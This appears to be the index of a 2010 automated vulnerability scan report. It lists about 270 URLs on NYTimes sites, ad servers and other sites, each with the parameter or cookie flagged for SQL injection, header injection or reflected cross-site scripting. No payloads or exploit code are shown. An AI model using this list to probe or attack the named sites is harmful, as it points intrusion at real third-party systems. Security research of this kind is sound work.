Report generated by XSS.CX at Fri Nov 12 22:21:15 CST 2010.
Cross Site Scripting Reports | Hoyt LLC Research
1. SQL injection
1.1. http://ad.vulnerable.ad.partner/adj/N5739.NYTimes.com/B4990972.8 [ad parameter]
1.2. http://ad.vulnerable.ad.partner/adj/N5739.NYTimes.com/B4990972.8 [camp parameter]
1.3. http://ad.vulnerable.ad.partner/adj/N5739.NYTimes.com/B4990972.8 [name of an arbitrarily supplied request parameter]
1.4. http://ad.vulnerable.ad.partner/adj/N5739.NYTimes.com/B4990972.8 [opzn&page parameter]
1.5. http://ad.vulnerable.ad.partner/adj/N5739.NYTimes.com/B4990972.8 [pos parameter]
1.6. http://amch.questionmarket.com/adscgen/sta.php [REST URL parameter 2]
2. HTTP header injection
2.1. http://50.xg4ken.com/media/redir.php [name of an arbitrarily supplied request parameter]
2.2. http://50.xg4ken.com/media/redir.php [url[] parameter]
2.3. http://bs.serving-sys.com/BurstingPipe/BannerRedirect.asp [eyeblaster cookie]
2.4. http://bs.serving-sys.com/BurstingPipe/BannerSource.asp [Pos parameter]
2.5. http://bs.serving-sys.com/BurstingPipe/BannerSource.asp [eyeblaster cookie]
2.6. http://bs.serving-sys.com/BurstingPipe/BurstingInteractionsPipe.asp [eyeblaster cookie]
2.7. http://bs.serving-sys.com/BurstingPipe/BurstingInteractionsPipe.asp [flv parameter]
2.8. http://bs.serving-sys.com/BurstingPipe/BurstingInteractionsPipe.asp [res parameter]
2.9. http://bs.serving-sys.com/BurstingPipe/BurstingInteractionsPipe.asp [wmpv parameter]
2.10. http://bs.serving-sys.com/BurstingPipe/adServer.bs [eyeblaster cookie]
2.11. https://careers.nytco.com/psc/TAM/EMPLOYEE/HRMS/c/HRS_HRAM.HRS_CE.GBL [REST URL parameter 3]
2.12. https://careers.nytco.com/psc/TAM/EMPLOYEE/HRMS/c/HRS_HRAM.HRS_CE.GBL [REST URL parameter 4]
2.13. https://careers.nytco.com/psc/TAM/EMPLOYEE/HRMS/c/HRS_HRAM.HRS_CE.GBL [REST URL parameter 5]
2.14. https://careers.nytco.com/psc/TAM/EMPLOYEE/HRMS/c/HRS_HRAM.HRS_CE.GBL [REST URL parameter 6]
2.15. http://movies2.nytimes.com/gst/movies/movie.html [REST URL parameter 1]
2.16. http://movies2.nytimes.com/gst/movies/movie.html [REST URL parameter 2]
2.17. http://movies2.nytimes.com/gst/movies/movie.html [REST URL parameter 3]
2.18. http://na.link.decdna.net/n/78471/87266/ad.vulnerable.ad.partner/dfwcxw [11;4;;8;;cmwtbr;1lqc0s;;dml15;;1;/i/c?0&pq parameter]
2.19. http://na.link.decdna.net/n/78471/87266/ad.vulnerable.ad.partner/dfwcxw [REST URL parameter 4]
2.20. http://nytimes.com/ref/membercenter/help/infoservdirectory.html [REST URL parameter 1]
2.21. http://nytimes.com/ref/membercenter/help/infoservdirectory.html [REST URL parameter 2]
2.22. http://nytimes.com/ref/membercenter/help/infoservdirectory.html [REST URL parameter 3]
2.23. http://nytimes.com/ref/membercenter/help/infoservdirectory.html [REST URL parameter 4]
2.24. http://nytimes.com/rss [REST URL parameter 1]
2.25. http://pixel2519.everesttech.net/2519/rq/3/c_a8ccd1264e488999b21c12b5c7cd18c1_5314096229/url=http:/clickserve.dartsearch.net/link/click [REST URL parameter 3]
2.26. http://pixel2519.everesttech.net/2519/rq/3/c_a8ccd1264e488999b21c12b5c7cd18c1_5314096229/url=http:/clickserve.dartsearch.net/link/click [REST URL parameter 4]
2.27. http://theater2.nytimes.com/gst/theater/tabclist.html [REST URL parameter 1]
2.28. http://theater2.nytimes.com/gst/theater/tabclist.html [REST URL parameter 2]
2.29. http://theater2.nytimes.com/gst/theater/tabclist.html [REST URL parameter 3]
2.30. http://topics.nytimes.com/top/news/business/companies/facebook_inc/ [REST URL parameter 2]
2.31. http://topics.nytimes.com/top/news/business/companies/facebook_inc/ [REST URL parameter 3]
2.32. http://topics.nytimes.com/top/news/business/companies/facebook_inc/ [REST URL parameter 4]
2.33. http://topics.nytimes.com/top/news/business/companies/facebook_inc/ [REST URL parameter 5]
2.34. http://topics.nytimes.com/top/news/international/countriesandterritories/afghanistan/ [REST URL parameter 2]
2.35. http://topics.nytimes.com/top/news/international/countriesandterritories/afghanistan/ [REST URL parameter 3]
2.36. http://topics.nytimes.com/top/news/international/countriesandterritories/afghanistan/ [REST URL parameter 4]
2.37. http://topics.nytimes.com/top/news/international/countriesandterritories/afghanistan/ [REST URL parameter 5]
2.38. http://topics.nytimes.com/top/news/international/countriesandterritories/haiti/ [REST URL parameter 2]
2.39. http://topics.nytimes.com/top/news/international/countriesandterritories/haiti/ [REST URL parameter 3]
2.40. http://topics.nytimes.com/top/news/international/countriesandterritories/haiti/ [REST URL parameter 4]
2.41. http://topics.nytimes.com/top/news/international/countriesandterritories/haiti/ [REST URL parameter 5]
2.42. http://topics.nytimes.com/top/news/science/topics/globalwarming/ [REST URL parameter 2]
2.43. http://topics.nytimes.com/top/news/science/topics/globalwarming/ [REST URL parameter 3]
2.44. http://topics.nytimes.com/top/news/science/topics/globalwarming/ [REST URL parameter 4]
2.45. http://topics.nytimes.com/top/news/science/topics/globalwarming/ [REST URL parameter 5]
2.46. http://topics.nytimes.com/top/opinion/editorialsandoped/editorials/ [REST URL parameter 2]
2.47. http://topics.nytimes.com/top/opinion/editorialsandoped/editorials/ [REST URL parameter 3]
2.48. http://topics.nytimes.com/top/opinion/editorialsandoped/editorials/ [REST URL parameter 4]
2.49. http://topics.nytimes.com/top/opinion/editorialsandoped/letters/ [REST URL parameter 2]
2.50. http://topics.nytimes.com/top/opinion/editorialsandoped/letters/ [REST URL parameter 3]
2.51. http://topics.nytimes.com/top/opinion/editorialsandoped/letters/ [REST URL parameter 4]
2.52. http://topics.nytimes.com/top/opinion/editorialsandoped/oped/columnists/ [REST URL parameter 2]
2.53. http://topics.nytimes.com/top/opinion/editorialsandoped/oped/columnists/ [REST URL parameter 3]
2.54. http://topics.nytimes.com/top/opinion/editorialsandoped/oped/columnists/ [REST URL parameter 4]
2.55. http://topics.nytimes.com/top/opinion/editorialsandoped/oped/columnists/ [REST URL parameter 5]
2.56. http://topics.nytimes.com/top/opinion/editorialsandoped/oped/columnists/paulkrugman/ [REST URL parameter 2]
2.57. http://topics.nytimes.com/top/opinion/editorialsandoped/oped/columnists/paulkrugman/ [REST URL parameter 3]
2.58. http://topics.nytimes.com/top/opinion/editorialsandoped/oped/columnists/paulkrugman/ [REST URL parameter 4]
2.59. http://topics.nytimes.com/top/opinion/editorialsandoped/oped/columnists/paulkrugman/ [REST URL parameter 5]
2.60. http://topics.nytimes.com/top/opinion/editorialsandoped/oped/columnists/paulkrugman/ [REST URL parameter 6]
2.61. http://topics.nytimes.com/top/opinion/editorialsandoped/oped/contributors/ [REST URL parameter 2]
2.62. http://topics.nytimes.com/top/opinion/editorialsandoped/oped/contributors/ [REST URL parameter 3]
2.63. http://topics.nytimes.com/top/opinion/editorialsandoped/oped/contributors/ [REST URL parameter 4]
2.64. http://topics.nytimes.com/top/opinion/editorialsandoped/oped/contributors/ [REST URL parameter 5]
2.65. http://topics.nytimes.com/top/reference/timestopics/ [REST URL parameter 2]
2.66. http://topics.nytimes.com/top/reference/timestopics/ [REST URL parameter 3]
2.67. http://topics.nytimes.com/top/reference/timestopics/organizations/p/park51/ [REST URL parameter 2]
2.68. http://topics.nytimes.com/top/reference/timestopics/organizations/p/park51/ [REST URL parameter 3]
2.69. http://topics.nytimes.com/top/reference/timestopics/organizations/p/park51/ [REST URL parameter 4]
2.70. http://topics.nytimes.com/top/reference/timestopics/organizations/p/park51/ [REST URL parameter 5]
2.71. http://topics.nytimes.com/top/reference/timestopics/organizations/p/park51/ [REST URL parameter 6]
2.72. http://topics.nytimes.com/top/reference/timestopics/people/m/madonna/ [REST URL parameter 2]
2.73. http://topics.nytimes.com/top/reference/timestopics/people/m/madonna/ [REST URL parameter 3]
2.74. http://topics.nytimes.com/top/reference/timestopics/people/m/madonna/ [REST URL parameter 4]
2.75. http://topics.nytimes.com/top/reference/timestopics/people/m/madonna/ [REST URL parameter 5]
2.76. http://topics.nytimes.com/top/reference/timestopics/people/m/madonna/ [REST URL parameter 6]
2.77. http://topics.nytimes.com/top/reference/timestopics/subjects/o/oil_spills/gulf_of_mexico_2010/ [REST URL parameter 2]
2.78. http://topics.nytimes.com/top/reference/timestopics/subjects/o/oil_spills/gulf_of_mexico_2010/ [REST URL parameter 3]
2.79. http://topics.nytimes.com/top/reference/timestopics/subjects/o/oil_spills/gulf_of_mexico_2010/ [REST URL parameter 4]
2.80. http://topics.nytimes.com/top/reference/timestopics/subjects/o/oil_spills/gulf_of_mexico_2010/ [REST URL parameter 5]
2.81. http://topics.nytimes.com/top/reference/timestopics/subjects/o/oil_spills/gulf_of_mexico_2010/ [REST URL parameter 6]
2.82. http://topics.nytimes.com/top/reference/timestopics/subjects/o/oil_spills/gulf_of_mexico_2010/ [REST URL parameter 7]
3. Cross-site scripting (reflected)
3.1. http://ad.vulnerable.ad.partner/adj/N3282.nytimes.comSD6440/B3948326.5 [ad parameter]
3.2. http://ad.vulnerable.ad.partner/adj/N3282.nytimes.comSD6440/B3948326.5 [camp parameter]
3.3. http://ad.vulnerable.ad.partner/adj/N3282.nytimes.comSD6440/B3948326.5 [goto parameter]
3.4. http://ad.vulnerable.ad.partner/adj/N3282.nytimes.comSD6440/B3948326.5 [name of an arbitrarily supplied request parameter]
3.5. http://ad.vulnerable.ad.partner/adj/N3282.nytimes.comSD6440/B3948326.5 [opzn&page parameter]
3.6. http://ad.vulnerable.ad.partner/adj/N3282.nytimes.comSD6440/B3948326.5 [p parameter]
3.7. http://ad.vulnerable.ad.partner/adj/N3282.nytimes.comSD6440/B3948326.5 [pos parameter]
3.8. http://ad.vulnerable.ad.partner/adj/N3282.nytimes.comSD6440/B3948326.5 [sn1 parameter]
3.9. http://ad.vulnerable.ad.partner/adj/N3282.nytimes.comSD6440/B3948326.5 [sn2 parameter]
3.10. http://ad.vulnerable.ad.partner/adj/N3282.nytimes.comSD6440/B3948326.5 [snr parameter]
3.11. http://ad.vulnerable.ad.partner/adj/N3282.nytimes.comSD6440/B3948326.5 [snx parameter]
3.12. http://ad.vulnerable.ad.partner/adj/N5295.NewYorkTimes/B4885922 [ad parameter]
3.13. http://ad.vulnerable.ad.partner/adj/N5295.NewYorkTimes/B4885922 [ad parameter]
3.14. http://ad.vulnerable.ad.partner/adj/N5295.NewYorkTimes/B4885922 [camp parameter]
3.15. http://ad.vulnerable.ad.partner/adj/N5295.NewYorkTimes/B4885922 [camp parameter]
3.16. http://ad.vulnerable.ad.partner/adj/N5295.NewYorkTimes/B4885922 [goto parameter]
3.17. http://ad.vulnerable.ad.partner/adj/N5295.NewYorkTimes/B4885922 [goto parameter]
3.18. http://ad.vulnerable.ad.partner/adj/N5295.NewYorkTimes/B4885922 [name of an arbitrarily supplied request parameter]
3.19. http://ad.vulnerable.ad.partner/adj/N5295.NewYorkTimes/B4885922 [name of an arbitrarily supplied request parameter]
3.20. http://ad.vulnerable.ad.partner/adj/N5295.NewYorkTimes/B4885922 [opzn&page parameter]
3.21. http://ad.vulnerable.ad.partner/adj/N5295.NewYorkTimes/B4885922 [opzn&page parameter]
3.22. http://ad.vulnerable.ad.partner/adj/N5295.NewYorkTimes/B4885922 [pos parameter]
3.23. http://ad.vulnerable.ad.partner/adj/N5295.NewYorkTimes/B4885922 [pos parameter]
3.24. http://ad.vulnerable.ad.partner/adj/N5295.NewYorkTimes/B4885922 [sn1 parameter]
3.25. http://ad.vulnerable.ad.partner/adj/N5295.NewYorkTimes/B4885922 [sn1 parameter]
3.26. http://ad.vulnerable.ad.partner/adj/N5295.NewYorkTimes/B4885922 [sn2 parameter]
3.27. http://ad.vulnerable.ad.partner/adj/N5295.NewYorkTimes/B4885922 [sn2 parameter]
3.28. http://ad.vulnerable.ad.partner/adj/N5295.NewYorkTimes/B4885922 [snr parameter]
3.29. http://ad.vulnerable.ad.partner/adj/N5295.NewYorkTimes/B4885922 [snr parameter]
3.30. http://ad.vulnerable.ad.partner/adj/N5295.NewYorkTimes/B4885922 [snx parameter]
3.31. http://ad.vulnerable.ad.partner/adj/N5295.NewYorkTimes/B4885922 [snx parameter]
3.32. http://ad.vulnerable.ad.partner/adj/N5295.NewYorkTimes/B4885922 [sz parameter]
3.33. http://ad.vulnerable.ad.partner/adj/N5295.NewYorkTimes/B4885922 [sz parameter]
3.34. http://ad.vulnerable.ad.partner/adj/N5739.NYTimes.com/B4990972.8 [click parameter]
3.35. http://artsbeat.blogs.nytimes.com/2010/11/11/anatomy-of-a-scene-unstoppable/ [src parameter]
3.36. http://artsbeat.blogs.nytimes.com/2010/11/12/kanye-west-was-coached-for-today-interview-gone-awry/ [src parameter]
3.37. http://artsbeat.blogs.nytimes.com/2010/11/12/the-week-in-culture-pictures-nov-12/ [src parameter]
3.38. http://artsbeat.blogs.nytimes.com/category/art-design/ [REST URL parameter 2]
3.39. http://artsbeat.blogs.nytimes.com/category/arts-general/ [REST URL parameter 2]
3.40. http://artsbeat.blogs.nytimes.com/category/books/ [REST URL parameter 2]
3.41. http://artsbeat.blogs.nytimes.com/category/classical-music/ [REST URL parameter 2]
3.42. http://artsbeat.blogs.nytimes.com/category/dance/ [REST URL parameter 2]
3.43. http://artsbeat.blogs.nytimes.com/category/featured/ [REST URL parameter 2]
3.44. http://artsbeat.blogs.nytimes.com/category/movies/ [REST URL parameter 2]
3.45. http://artsbeat.blogs.nytimes.com/category/music/ [REST URL parameter 2]
3.46. http://artsbeat.blogs.nytimes.com/category/new-york-city/ [REST URL parameter 2]
3.47. http://artsbeat.blogs.nytimes.com/category/television/ [REST URL parameter 2]
3.48. http://artsbeat.blogs.nytimes.com/category/theater/ [REST URL parameter 2]
3.49. http://artsbeat.blogs.nytimes.com/tag/amc/ [REST URL parameter 2]
3.50. http://artsbeat.blogs.nytimes.com/tag/anatomy-of-a-scene/ [REST URL parameter 2]
3.51. http://artsbeat.blogs.nytimes.com/tag/chris-pine/ [REST URL parameter 2]
3.52. http://artsbeat.blogs.nytimes.com/tag/denzel-washington/ [REST URL parameter 2]
3.53. http://artsbeat.blogs.nytimes.com/tag/hip-hop/ [REST URL parameter 2]
3.54. http://artsbeat.blogs.nytimes.com/tag/james-levine/ [REST URL parameter 2]
3.55. http://artsbeat.blogs.nytimes.com/tag/kanye-west/ [REST URL parameter 2]
3.56. http://artsbeat.blogs.nytimes.com/tag/matt-lauer/ [REST URL parameter 2]
3.57. http://artsbeat.blogs.nytimes.com/tag/metropolitan-opera/ [REST URL parameter 2]
3.58. http://artsbeat.blogs.nytimes.com/tag/rubicon/ [REST URL parameter 2]
3.59. http://artsbeat.blogs.nytimes.com/tag/the-nutcracker-chronicles/ [REST URL parameter 2]
3.60. http://artsbeat.blogs.nytimes.com/tag/today/ [REST URL parameter 2]
3.61. http://artsbeat.blogs.nytimes.com/tag/tony-scott/ [REST URL parameter 2]
3.62. http://artsbeat.blogs.nytimes.com/tag/unstoppable/ [REST URL parameter 2]
3.63. http://artsbeat.blogs.nytimes.com/tag/week-in-culture-pictures/ [REST URL parameter 2]
3.64. http://atwar.blogs.nytimes.com/2010/11/12/the-state-of-schools-in-swat/ [src parameter]
3.65. http://bits.blogs.nytimes.com/2010/11/12/facebook-to-start-an-e-mail-service/ [src parameter]
3.66. http://bs.serving-sys.com/BurstingPipe/adServer.bs [h parameter]
3.67. http://bs.serving-sys.com/BurstingPipe/adServer.bs [w parameter]
3.68. http://bs.serving-sys.com/BurstingPipe/adServer.bs [z parameter]
3.69. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/11/anatomy-of-a-scene-unstoppable/ [REST URL parameter 1]
3.70. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/11/anatomy-of-a-scene-unstoppable/ [REST URL parameter 1]
3.71. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/11/anatomy-of-a-scene-unstoppable/ [REST URL parameter 2]
3.72. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/11/anatomy-of-a-scene-unstoppable/ [name of an arbitrarily supplied request parameter]
3.73. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/11/ancient-roman-shrine-restored-reopens-to-public/ [REST URL parameter 1]
3.74. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/11/ancient-roman-shrine-restored-reopens-to-public/ [REST URL parameter 1]
3.75. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/11/ancient-roman-shrine-restored-reopens-to-public/ [REST URL parameter 2]
3.76. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/11/ancient-roman-shrine-restored-reopens-to-public/ [name of an arbitrarily supplied request parameter]
3.77. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/11/grants-awarded-for-preservation-of-new-york-sites/ [REST URL parameter 1]
3.78. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/11/grants-awarded-for-preservation-of-new-york-sites/ [REST URL parameter 1]
3.79. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/11/grants-awarded-for-preservation-of-new-york-sites/ [REST URL parameter 2]
3.80. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/11/grants-awarded-for-preservation-of-new-york-sites/ [name of an arbitrarily supplied request parameter]
3.81. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/11/met-says-levine-is-much-better-after-illness-forces-withdrawal/ [REST URL parameter 1]
3.82. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/11/met-says-levine-is-much-better-after-illness-forces-withdrawal/ [REST URL parameter 1]
3.83. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/11/met-says-levine-is-much-better-after-illness-forces-withdrawal/ [REST URL parameter 2]
3.84. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/11/met-says-levine-is-much-better-after-illness-forces-withdrawal/ [name of an arbitrarily supplied request parameter]
3.85. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/11/play-about-martin-luther-king-now-aiming-for-broadway-next-fall/ [REST URL parameter 1]
3.86. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/11/play-about-martin-luther-king-now-aiming-for-broadway-next-fall/ [REST URL parameter 1]
3.87. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/11/play-about-martin-luther-king-now-aiming-for-broadway-next-fall/ [REST URL parameter 2]
3.88. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/11/play-about-martin-luther-king-now-aiming-for-broadway-next-fall/ [name of an arbitrarily supplied request parameter]
3.89. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/11/spider-man-musical-teams-with-syfy-channel/ [REST URL parameter 1]
3.90. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/11/spider-man-musical-teams-with-syfy-channel/ [REST URL parameter 1]
3.91. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/11/spider-man-musical-teams-with-syfy-channel/ [REST URL parameter 2]
3.92. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/11/spider-man-musical-teams-with-syfy-channel/ [name of an arbitrarily supplied request parameter]
3.93. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/11/tangled-web-of-rubicon-unravels-at-amc/ [REST URL parameter 1]
3.94. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/11/tangled-web-of-rubicon-unravels-at-amc/ [REST URL parameter 1]
3.95. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/11/tangled-web-of-rubicon-unravels-at-amc/ [REST URL parameter 2]
3.96. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/11/tangled-web-of-rubicon-unravels-at-amc/ [name of an arbitrarily supplied request parameter]
3.97. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/12/book-review-podcast-the-emperor-of-all-maladies/ [REST URL parameter 1]
3.98. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/12/book-review-podcast-the-emperor-of-all-maladies/ [REST URL parameter 1]
3.99. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/12/book-review-podcast-the-emperor-of-all-maladies/ [REST URL parameter 2]
3.100. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/12/book-review-podcast-the-emperor-of-all-maladies/ [name of an arbitrarily supplied request parameter]
3.101. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/12/here-comes-rhymin-simon-on-a-different-label/ [REST URL parameter 1]
3.102. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/12/here-comes-rhymin-simon-on-a-different-label/ [REST URL parameter 1]
3.103. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/12/here-comes-rhymin-simon-on-a-different-label/ [REST URL parameter 2]
3.104. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/12/here-comes-rhymin-simon-on-a-different-label/ [name of an arbitrarily supplied request parameter]
3.105. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/12/kanye-west-was-coached-for-today-interview-gone-awry/ [REST URL parameter 1]
3.106. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/12/kanye-west-was-coached-for-today-interview-gone-awry/ [REST URL parameter 1]
3.107. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/12/kanye-west-was-coached-for-today-interview-gone-awry/ [REST URL parameter 2]
3.108. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/12/kanye-west-was-coached-for-today-interview-gone-awry/ [name of an arbitrarily supplied request parameter]
3.109. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/12/proposal-recommends-charging-admission-at-the-smithsonian/ [REST URL parameter 1]
3.110. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/12/proposal-recommends-charging-admission-at-the-smithsonian/ [REST URL parameter 1]
3.111. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/12/proposal-recommends-charging-admission-at-the-smithsonian/ [REST URL parameter 2]
3.112. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/12/proposal-recommends-charging-admission-at-the-smithsonian/ [name of an arbitrarily supplied request parameter]
3.113. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/12/the-week-in-culture-pictures-nov-12/ [REST URL parameter 1]
3.114. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/12/the-week-in-culture-pictures-nov-12/ [REST URL parameter 1]
3.115. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/12/the-week-in-culture-pictures-nov-12/ [REST URL parameter 2]
3.116. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/12/the-week-in-culture-pictures-nov-12/ [name of an arbitrarily supplied request parameter]
3.117. http://community.nytimes.com/comments/opinionator.blogs.nytimes.com/2010/11/12/a-deficit-of-respect/ [REST URL parameter 1]
3.118. http://community.nytimes.com/comments/opinionator.blogs.nytimes.com/2010/11/12/a-deficit-of-respect/ [REST URL parameter 1]
3.119. http://community.nytimes.com/comments/opinionator.blogs.nytimes.com/2010/11/12/a-deficit-of-respect/ [REST URL parameter 2]
3.120. http://community.nytimes.com/comments/opinionator.blogs.nytimes.com/2010/11/12/a-deficit-of-respect/ [name of an arbitrarily supplied request parameter]
3.121. http://community.nytimes.com/comments/wheels.blogs.nytimes.com/2010/11/05/reviewing-the-2011-aston-martin-v-12-vantage/ [REST URL parameter 1]
3.122. http://community.nytimes.com/comments/wheels.blogs.nytimes.com/2010/11/05/reviewing-the-2011-aston-martin-v-12-vantage/ [REST URL parameter 1]
3.123. http://community.nytimes.com/comments/wheels.blogs.nytimes.com/2010/11/05/reviewing-the-2011-aston-martin-v-12-vantage/ [REST URL parameter 2]
3.124. http://community.nytimes.com/comments/wheels.blogs.nytimes.com/2010/11/05/reviewing-the-2011-aston-martin-v-12-vantage/ [name of an arbitrarily supplied request parameter]
3.125. http://dealbook.nytimes.com/2010/11/12/the-acquisition-of-tina-brown/ [src parameter]
3.126. http://digg.com/remote-submit [REST URL parameter 1]
3.127. http://dinersjournal.blogs.nytimes.com/2010/11/12/using-root-vegetables-raw/ [src parameter]
3.128. http://economix.blogs.nytimes.com/2010/11/12/a-high-water-mark-for-profits/ [src parameter]
3.129. http://frugaltraveler.blogs.nytimes.com/2010/10/19/does-jetblues-all-you-can-jet-pass-fill-you-up-users-respond/ [src parameter]
3.130. http://frugaltraveler.blogs.nytimes.com/2010/11/02/a-guide-to-the-caribbean-on-a-budget/ [src parameter]
3.131. http://frugaltraveler.blogs.nytimes.com/2010/11/10/biking-los-angeles/ [src parameter]
3.132. http://gadgetwise.blogs.nytimes.com/2010/11/12/ipad-apps-that-provide-recipes-and-avoid-strife/ [src parameter]
3.133. http://harpers.org/subjects/Sentences [REST URL parameter 2]
3.134. http://idolator.com/ [name of an arbitrarily supplied request parameter]
3.135. http://intransit.blogs.nytimes.com/2010/09/15/show-us-your-city/ [src parameter]
3.136. http://intransit.blogs.nytimes.com/2010/11/11/prague-art-show-embraces-decadence/ [src parameter]
3.137. http://intransit.blogs.nytimes.com/2010/11/11/qa-adding-angkor-to-a-vietnam-bike-trip/ [src parameter]
3.138. http://intransit.blogs.nytimes.com/2010/11/12/japans-high-speed-trains-lines-expand/ [src parameter]
3.139. http://intransit.blogs.nytimes.com/2010/11/12/paris-photo-fair-covers-the-spectrum/ [src parameter]
3.140. http://intransit.blogs.nytimes.com/2010/11/12/sunday-preview-66/ [src parameter]
3.141. http://lens.blogs.nytimes.com/2010/11/12/pictures-of-the-day-afghanistan-and-elsewhere-6/ [src parameter]
3.142. http://mediadecoder.blogs.nytimes.com/2010/11/12/judge-considers-case-of-mel-gibsons-leaky-court-file/ [src parameter]
3.143. http://motherjones.com/kevin-drum/2010/11/deficit-commission-serious [REST URL parameter 2]
3.144. http://motherjones.com/kevin-drum/2010/11/deficit-commission-serious [REST URL parameter 3]
3.145. http://motherjones.com/kevin-drum/2010/11/deficit-commission-serious [REST URL parameter 4]
3.146. http://movies.nytimes.com/2010/11/10/movies/10morning.html [name of an arbitrarily supplied request parameter]
3.147. http://movies.nytimes.com/2010/11/10/movies/10morning.html [src parameter]
3.148. http://movies.nytimes.com/2010/11/12/movies/12con.html [name of an arbitrarily supplied request parameter]
3.149. http://movies.nytimes.com/2010/11/12/movies/12con.html [ref parameter]
3.150. http://movies.nytimes.com/2010/11/12/movies/12cool.html [hpw parameter]
3.151. http://movies.nytimes.com/2010/11/12/movies/12cool.html [name of an arbitrarily supplied request parameter]
3.152. http://movies.nytimes.com/2010/11/12/movies/12cool.html [ref parameter]
3.153. http://movies.nytimes.com/2010/11/12/movies/12disco.html [name of an arbitrarily supplied request parameter]
3.154. http://movies.nytimes.com/2010/11/12/movies/12disco.html [ref parameter]
3.155. http://movies.nytimes.com/2010/11/12/movies/12eichmann.html [name of an arbitrarily supplied request parameter]
3.156. http://movies.nytimes.com/2010/11/12/movies/12eichmann.html [ref parameter]
3.157. http://movies.nytimes.com/2010/11/12/movies/12helena.html [name of an arbitrarily supplied request parameter]
3.158. http://movies.nytimes.com/2010/11/12/movies/12helena.html [ref parameter]
3.159. http://movies.nytimes.com/2010/11/12/movies/12magic.html [name of an arbitrarily supplied request parameter]
3.160. http://movies.nytimes.com/2010/11/12/movies/12magic.html [ref parameter]
3.161. http://movies.nytimes.com/2010/11/12/movies/12shake.html [name of an arbitrarily supplied request parameter]
3.162. http://movies.nytimes.com/2010/11/12/movies/12shake.html [ref parameter]
3.163. http://movies.nytimes.com/2010/11/12/movies/12tiny.html [name of an arbitrarily supplied request parameter]
3.164. http://movies.nytimes.com/2010/11/12/movies/12tiny.html [ref parameter]
3.165. http://movies.nytimes.com/2010/11/12/movies/12unstop.html [hpw parameter]
3.166. http://movies.nytimes.com/2010/11/12/movies/12unstop.html [name of an arbitrarily supplied request parameter]
3.167. http://movies.nytimes.com/2010/11/12/movies/12unstop.html [ref parameter]
3.168. http://movies.nytimes.com/2010/11/12/movies/12unstop.html [src parameter]
3.169. http://movies.nytimes.com/2010/11/13/movies/13sky.html [hpw parameter]
3.170. http://movies.nytimes.com/2010/11/13/movies/13sky.html [name of an arbitrarily supplied request parameter]
3.171. http://movies.nytimes.com/movie/401469/Unstoppable/overview [name of an arbitrarily supplied request parameter]
3.172. http://nahright.com/news/ [name of an arbitrarily supplied request parameter]
3.173. http://opinionator.blogs.nytimes.com/2010/11/11/a-republican-for-higher-taxes/ [src parameter]
3.174. http://opinionator.blogs.nytimes.com/2010/11/12/a-deficit-of-respect/ [src parameter]
3.175. http://opinionator.blogs.nytimes.com/2010/11/12/the-ways-of-empathy/ [src parameter]
3.176. http://opinionator.blogs.nytimes.com/category/alec-soth [REST URL parameter 2]
3.177. http://opinionator.blogs.nytimes.com/category/alec-soth/feed/ [REST URL parameter 3]
3.178. http://opinionator.blogs.nytimes.com/category/alec-soth/page/2/ [REST URL parameter 3]
3.179. http://opinionator.blogs.nytimes.com/category/allison-arieff [REST URL parameter 2]
3.180. http://opinionator.blogs.nytimes.com/category/allison-arieff/feed/ [REST URL parameter 3]
3.181. http://opinionator.blogs.nytimes.com/category/allison-arieff/page/2/ [REST URL parameter 3]
3.182. http://opinionator.blogs.nytimes.com/category/dick-cavett [REST URL parameter 2]
